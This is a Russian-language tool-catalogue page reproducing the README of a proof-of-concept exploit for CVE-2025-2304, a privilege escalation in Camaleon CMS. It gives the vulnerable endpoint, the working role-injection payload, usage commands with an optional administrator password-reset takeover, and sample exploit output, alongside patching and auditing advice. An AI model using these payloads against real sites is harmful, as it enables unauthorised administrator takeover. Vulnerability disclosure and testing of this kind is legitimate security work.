Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2304-POC — Доказательство концепции для CVE-2025-2304 — критическое (CVSS 9.4) повышение привилегий через массовое присваивание в Camaleon CMS. | Kitploit
Инструменты/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Доказательство концепции для CVE-2025-2304 — критическое (CVSS 9.4) повышение привилегий через массовое присваивание в Camaleon CMS.

Репозиторий
10334 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-2304 PoC — Повышение привилегий в Camaleon CMS

CVE CVSS Python License

Эксплойт Proof of Concept (PoC) для CVE-2025-2304 — критической уязвимости массового присваивания (mass assignment) в Camaleon CMS, которая позволяет повышать привилегии от пользователей с низкими правами до администраторов.

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Использование
  • Примеры
  • Затронутые версии
  • Меры предотвращения
  • Отказ от ответственности
  • Ссылки
  • Автор

🔍 Обзор

CVE-2025-2304 — это критическая уязвимость массового присваивания в Camaleon CMS, которая присутствует в методе updated_ajax контроллера UsersController. Уязвимость вызвана использованием опасного метода permit! в Rails, который пропускает все параметры без какой-либо фильтрации.

Данный PoC демонстрирует, как аутентифицированный пользователь с низкими привилегиями может повысить свою роль до администратора, внедряя несанкционированные параметры во время операций смены пароля.

Оценка CVSS: 9.4 (критическая)

🐛 Детали уязвимости

Первопричина

Уязвимый код использует params.require(:user).permit!, который принимает все переданные пользователем параметры без проверки:

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # ОПАСНО!
  current_user.update(user_params)
end

Эксплуатация

Злоумышленник может внедрить дополнительные параметры, такие как user[role]=admin, вместе с легитимными полями смены пароля, что приведёт к обновлению роли пользователя до администратора.

Вектор атаки:

  1. Аутентификация под пользователем с низкими привилегиями (например, роль «client»)
  2. Отправка подделанного POST-запроса на /admin/users/{id}/updated_ajax
  3. Внедрение параметра user[role]=admin
  4. Роль пользователя повышается до администратора

✨ Возможности

  • ✅ Безопасное тестирование: сохраняет пароль пользователя во время эксплуатации
  • ✅ Несколько полезных нагрузок: проверяет 7+ различных техник инъекций
  • ✅ Определение версии: автоматически определяет уязвимые версии CMS
  • ✅ Неконструктивный режим: флаг --no-password-field для максимально безопасного тестирования
  • ✅ Поддержка прокси: интеграция с Burp Suite/ZAP для ручного анализа
  • ✅ Подробный режим: детальный вывод для отладки
  • ✅ Захват администратора: опциональная атака со сбросом пароля администратора
  • ✅ Цветной вывод: наглядные индикаторы успеха/неудачи

📦 Установка

Требования

  • Python 3.7+
  • pip (менеджер пакетов Python)

Клонирование репозитория

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Установка зависимостей

root@kitploit:~
pip install -r requirements.txt

Или установить вручную:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Использование

Базовый синтаксис

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Параметры командной строки

root@kitploit:~
positional arguments:
  target                URL целевой системы (например, http://target.com)

required arguments:
  -u, --username        Имя существующего пользователя для аутентификации
  -p, --password        Пароль пользователя

optional arguments:
  -h, --help            Показать справку и выйти
  -v, --verbose         Подробный вывод (показывать все запросы)
  --proxy PROXY         HTTP-прокси для просмотра трафика (например, http://127.0.0.1:8080)
  --no-password-field   Проверка эксплуатации без полей пароля (самый безопасный режим)
  --skip-admin-test     Пропустить разрушительный тест сброса пароля администратора

📚 Примеры

Стандартный тест (рекомендуется)

Тест с учётными данными существующего пользователя с сохранением пароля:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Максимально безопасный тест (без полей пароля)

Тест без включения полей пароля в полезную нагрузку эксплойта:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

С прокси Burp Suite

Направление трафика через Burp Suite для ручного анализа:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Подробный режим

Включение детального вывода со всеми запросами и ответами:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Пропуск разрушительных тестов

Тест только повышения привилегий, без сброса пароля администратора:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Пример вывода

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Затронутые версии

ВерсияСтатус
< 2.9.1❌ Уязвима
≥ 2.9.1✅ Исправлена

Конкретно уязвимы:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x и более ранние

🛡️ Меры предотвращения

Немедленные действия

  1. Обновитесь до версии 2.9.1 или новее

    root@kitploit:~
    gem update camaleon_cms
    
  2. Проведите аудит учётных записей

    • Проверьте на предмет неожиданных изменений привилегий
    • Просмотрите журналы изменения ролей пользователей
    • Ищите подозрительные POST-запросы к /users/*/updated_ajax
  3. Принудительный сброс паролей (в случае компрометации)

    • Сбросьте пароли для всех привилегированных учётных записей
    • Аннулируйте существующие сессии

Долгосрочное предотвращение

Безопасный шаблон кода:

Замените опасный permit! на явный белый список:

root@kitploit:~
# Было (УЯЗВИМО)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# Стало (БЕЗОПАСНО)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

Дополнительные меры безопасности:

  • Внедрите строгую фильтрацию параметров во всём приложении
  • Добавьте рабочие процессы утверждения смены ролей для критических операций
  • Включите аудит журналов изменений привилегий
  • Используйте принцип минимальных привилегий
  • Отслеживайте попытки массового присваивания с помощью правил WAF

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и санкционированного тестирования безопасности.

Правовое уведомление:

  • Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам является незаконным согласно таким законам, как:
    • Закон о компьютерном мошенничестве и злоупотреблениях (CFAA) в США
    • Закон о неправомерном использовании компьютеров 1990 года в Великобритании
    • Аналогичное законодательство в других юрисдикциях
  • Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим инструментом
  • Пользователи несут полную ответственность за свои действия

Этичное использование:

  • Получите надлежащее разрешение перед тестированием
  • Соблюдайте практику ответственного раскрытия информации
  • Используйте в рамках тестирования на проникновение с утверждённым объёмом работ
  • Только в образовательных целях в контролируемых лабораторных средах

📖 Ссылки

  • Запись CVE: CVE-2025-2304
  • Уведомление GHSA: GHSA-rp28-mvq3-wf8j
  • Уведомление производителя: Tenable Security Research TRA-2025-09
  • Коммит с исправлением: GitHub Commit 179fd6b
  • Примечания к выпуску: Camaleon CMS 2.9.1

👤 Автор

d3vn0mi

  • GitHub: @d3vn0mi
  • Личный сайт: @d3vn0mi
  • Личный блог: @d3vn0mi

📝 Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

🤝 Участие в разработке

Вклады, вопросы и запросы функций приветствуются!

Загляните на страницу вопросов.

⭐ Выразите поддержку

Поставьте ⭐️, если этот проект помог вам!


Примечание: Этот репозиторий предназначен для исследований в области безопасности и образовательных целей. Всегда соблюдайте практику ответственного раскрытия информации и получайте надлежащее разрешение перед тестированием.

Скачать инструмент